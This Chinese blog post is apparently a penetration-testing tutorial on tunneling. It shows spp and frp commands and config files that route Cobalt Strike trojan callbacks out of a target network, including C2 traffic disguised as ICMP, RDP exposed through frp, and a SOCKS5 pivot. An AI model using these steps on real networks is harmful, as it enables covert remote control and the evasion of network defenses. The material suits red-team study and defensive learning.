内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透

已于 2024-06-02 20:29:18 修改
阅读量933 收藏 4
点赞数 10
分类专栏: 内网安全 文章标签: 网络安全
于 2024-05-30 22:47:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rumil/article/details/139336456
版权

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透

目录

内网穿透:解决网络控制上线&网络通讯问题 
隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网) 
代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)

spp隧道代理工具

支持的协议:
TCP、UDP、RUDP(可靠 UDP)、RICMP(可靠 ICMP)、RHTTP(可靠 HTTP)、KCP、Quic
支持类型:
正向代理、反向代理、SOCKS5正向代理、SOCKS5反向代理
协议和类型可以自由组合
外部代理协议和内部转发协议可以自由组合

spp工作原理图

spp详解以及下载地址:
https://github.com/esrrhs/spp/tree/0.6

image-20240529205935044

cs上线主机

spp代理通信

本工具使用简单,服务器、客户机各一条命令,就可建立连接。

服务端配置
chmod +x spp  ##添加执行权限
./spp -type server -proto tcp -listen :8888 ##启动spp,并设置为服务端,通信协议为tcp,监控本地的8888端口。

image-20240529211518533

客户端配置
chmod +x spp  ##添加执行权限
./spp -name "sx" -type reverse_proxy_client -server 服务器ip地址:8888 -fromaddr :7777 -toaddr :6666 -proxyproto tcp   ## 设置一个名字(自定义即可),连接服务器的IP地址及端口,将服务器的端口7777映射到本地的端口6666上,设置通信协议为tcp。

image-20240529212247397

服务端可进行查看连接状态

image-20240529212536488

CS配置

CS需要设置两个监听器,一个用于生成木马,一个用于接收反弹shell。

设置CS生成木马的监听器

此监听器IP地址要设置为服务端的IP地址,端口为刚才设置的7777端口,相当于木马执行后,会去访问服务端的7777端,而之前的设置就是将服务端的7777端口信息转发到本地6666端口。

image-20240529213231703

配置CS监听上线的监听器

接受上线主机的监听器(shell)。

image-20240529213337949

生成木马

image-20240529213525160

将木马上传到目标主机当中,执行即可。

image-20240529213619046

成功上线

image-20240529213851077

image-20240529214357108

spp服务端代理状态:

image-20240529214020706

spp隧道搭建

若目标主机的出网TCP被禁止,但是ICMP协议是能够通信的,所以通过SPP将目标主机上的TCP流量伪装为ICMP协议转发给服务端。

服务端配置

这里设置监听的是icmp协议。

./spp -type server -proto ricmp -listen 0.0.0.0  ##这里设置监听ICMP协议,全端口

image-20240529214808484

客户端配置

客户端配置需要在目标主机上进行执行此命令,将本地的TCP伪装为ICMP所以需要转发本地的端口。

spp -name "sx" -type proxy_client -server 服务器IP -fromaddr :7777 -toaddr :6666 -proxyproto tcp -proto ricmp

在这里插入图片描述

服务端状态,成功建立隧道

image-20240530191945279

CS配置

CS需要设置两个监听器,一个用于生成木马,一个用于接收反弹shell。

这生成本地的7777端口,因为客户端上已经设置了将7777端口转发了。

image-20240529221856082

生成另一个监听器,监听本地的IP地址的6666端口即可。

image-20240530192149453

监听器状态:

image-20240530192230323

生成木马,执行上线。

选择本地监听器,生成木马即可。

生成木马

将木马上传到目标机器,执行木马

image-20240530192807213

执行木马,成功上线

image-20240530192444768

spp客户端状态。并抓取流量分析,为icmp流量,伪装成功。

image-20240530192913290

ICMP流量

image-20240530194309039

spp隧道代理工具还可以伪装其他协议,具体详解见spp代理

frp内网穿透

frp 是一种快速反向代理,允许您将位于 NAT 或防火墙后面的本地服务器公开给Internet。它目前支持 TCPUDP,以及 HTTPHTTPS 协议,支持通过域名将请求转发到内部服务。frp 还提供 P2P 连接模式。

项目地址:fatedier/frp快速反向代理

对应下载即可

image-20240602192523847

内网穿透上线

frp配置

服务端配置,修改frps.ini配置文件,简单配置

image-20240602192727135

客户端配置

[common]
server_addr = 服务器ip
server_port = 8080	#连接端口

[nwct]
type = tcp
local_ip = 127.0.0.1
local_port = 9999
remote_port = 8888

image-20240602194819390

服务端开启。客户端开启。观察状态,成功建立连接。

客户端开启,向服务器建立连接。

image-20240602194850298

服务端状态,成功建立连接。

image-20240602194926511

CS上线

客户端开启CS,配置监听器。需要两个监听器,一个生成木马,一个监听反弹shell。

生成木马的监听器配置:

image-20240602195030145

接受shell的监听器配置:

image-20240602202151483

生成木马,上传到目标机器当中,执行,成功上线

image-20240602202216995

上传到目标机,并执行木马

image-20240602195309111

成功上线

image-20240602195355801

配置RDP远程桌面连接内网主机

服务端简单配置不变,开启frp服务

image-20240602200039136

客户端在目标机上执行,配置文件修改

[common]
server_addr = 服务器ip
server_port = 8080

[RDP]
type = tcp
local_ip = 127.0.0.1
local_port = 3389
remote_port = 5555

image-20240602200604485

开启客户端服务,服务端查看状态,成功建立连接

image-20240602200619109

服务端状态

image-20240602200452644

远程桌面连接:

image-20240602200929920

成功连接

image-20240602200805779

socks5代理转发

通过代理转发,实现访问内网web服务

客户端配置:

[socks5]                
type = tcp              
remote_port = 8081
plugin = socks5

image-20240602201205354

客户端执行即可

image-20240602201230346

服务端状态:

image-20240602201254773

通过代理软件或浏览器代理插件配置代理,可访问内网服务

image-20240602201508017

访问内网web服务

image-20240602201728676

文章不妥之处,欢迎批评指正!

rumilc
关注
  • 10
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网穿透常用的隧道代理工具
Y525698136的博客
07-17 418
内网穿透常用的隧道代理工具
【内网安全】 隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok&EW项目
今天是几号的博客
03-23 1297
推荐 相当于自己管理整个平台很方便nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等……),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。
2024年最新内网渗透之传输层隧道搭建_内网隧道工具lcx(1),看这一篇就够了
2401_84300239的博客
05-06 857
在测试环境中,有三台主机,其中Windows 7主机可以通过ping访问Windows Server 2008主机和Kali主机,而Kali主机和Windows Server 2008主机之间无法通过网络连接。在一般情况下,目‍标主机中是没有 nc 的。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
【内网安全-隧道搭建内网穿透_Spp上线(全双工通信)
02-06 1万+
内网穿透-隧道搭建Spp上线,双向连接,支持多种协议、方法
nps+Proxifier搭建socks5代理隧道进行内网穿透
热门推荐
good good study
01-28 1万+
在渗透过程中,我们需要快速实现内网穿透,从而绕过网络访问限制,直接从外网来访问内网 正向代理,服务器不出网。如拿下的web服务器,我们在上面ping baidu.com是ping不通的,即服务器不出网,此时需要使用正向代理工具 反向代理,服务器出网。如拿下的web服务器,我们在上面ping baidu.com是能ping通的,即服务器能出网,此时可以使用反向代理工具 实验环境搭建 nps NPS工具由NPS服务器端和NPS客户端组成,我们一般将NPS服务器端放在具有公网IP的VPS上,并
内网渗透系列:内网隧道spp
闵行小鱼塘
04-09 3460
本文研究支持多协议双向代理的一个工具spp
内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术
白帽黑客八哥的博客
06-17 963
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…此监听器IP地址要设置为服务端的IP地址,端口为刚才设置的7777端口,相当于木马执行后,会去访问服务端的7777端,而之前的设置就是将服务端的7777端口信息转发到本地6666端口。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
WEB安全-内网渗透
m0_73767545的博客
03-10 478
利用命令判断主机是否在域内。利用工具进行内网信息收集。
内网渗透技巧大全
黑战士的博客
04-28 1357
对于内部帐户,SPN将自动进行注册。SPN扫描的主要好处是,SPN扫描不需要连接到网络上的每个IP来检查服务端口,SPN通过LDAP查询向域控执行服务发现,SPN查询是Kerberos的票据行为一部分,因此比较难检测SPN扫描。参考2 :https://3gstudent.github.io/Office-Persistence-on-x64-operating-system。安装键盘记录的目地不光是记录本机密码,是记录管理员一切的密码,比如说信箱,WEB 网页密码等等,这样也可以得到管理员的很多信息。
红队专题-内网横向-工作组Workgroup与 Domain Active Directory域渗透
aming小老弟
12-21 1102
通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得域管理员权限,即可控制域内所有用户和主机,因此活动目录域环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码和数据”。
Oracle Solaris 9 - Sun Enterprise 10000 SSP 3.5 Installation Gui
07-20
Oracle Solaris 9 - Sun Enterprise 10000 SSP 3.5 Installation Guide Oracle Solaris 9 是一款基于 SPARC 架构的操作系统,由 Sun Microsystems 开发和维护。Sun Enterprise 10000 SSP 3.5 是一款大型服务器系统...
CAN-I2S-I2C-SPI-SSP.zip_SSP
09-21
主要介绍的是CAN、I2S、I2C、SPI、SSP这几种总线的介绍,让大家了解他们的具体情况。
Oracle Solaris 9 - Sun Enterprise 10000 SSP 3.5 User Guide-142
07-20
Oracle Solaris 9 - Sun Enterprise 10000 SSP 3.5 User Guide-142
matlab的双曲线代码-SSPTools:SSP工具
05-28
matlab的双曲线代码SSP工具SSPTools是一个MATLAB工具箱,用于研究数值方法的强稳定性(SSP)性质,这些数值方法近似于保守的双曲型偏微分方程的解。 有关SSP方法和当前研究项目的更多信息,请访问以下网址: 请签...
ssp-dccy-1.34.0.apk.1.1.1.1.1.1
10-13
ssp-dccy-1.34.0.apk.1.1.1.1.1.1
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8301
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
236页PPT丨制药企业数字化转型项目顶层规划方案 .pptx
06-26
236页PPT丨制药企业数字化转型项目顶层规划方案 .pptx
054ssm-jsp-mysql旅游景点线路网站.zip(可运行源码+数据库文件+文档)
最新发布
06-26
本系统采用了jsp技术,将所有业务模块采用以浏览器交互的模式,选择MySQL作为系统的数据库,开发工具选择eclipse来进行系统的设计。基本实现了旅游网站应有的主要功能模块,本系统有管理员、和会员,管理员权限如下:个人中心、会员管理、景点分类管理、旅游景点管理、旅游线路管理、系统管理;会员权限如下:个人中心、旅游景点管理、旅游线路管理、我的收藏管理等操作。 对系统进行测试后,改善了程序逻辑和代码。同时确保系统中所有的程序都能正常运行,所有的功能都能操作,并且该系统有很好的操作体验,实现了对于景点和会员双赢。 关键词:旅游网站;jsp;Mysql;
extern inline __attribute__((__always_inline__)) ssize_t read (int __fd, void *__buf, size_t __nbytes) { if (__ssp_bos0 (__buf) != (size_t) -1 && __nbytes > __ssp_bos0 (__buf)) __chk_fail (); return __read_alias (__fd, __buf, __nbytes); }
06-05
这段代码是什么意思? 这段代码是 C 语言中的一个内联函数,用于读取文件描述符为 __fd 的文件中的数据,读取的数据存储在 __buf 中,读取的数据长度为 __nbytes。该函数使用了 __always_inline__ 属性,表示该函数总是被内联展开,以提高程序的运行效率。 此外,该函数还包含了一些安全检查代码,用于检查 __buf 的起始位置和长度是否合法。如果 __buf 的起始位置不合法或者读取的数据长度大于 __buf 的可用空间,则会触发 __chk_fail() 函数,从而终止程序的执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值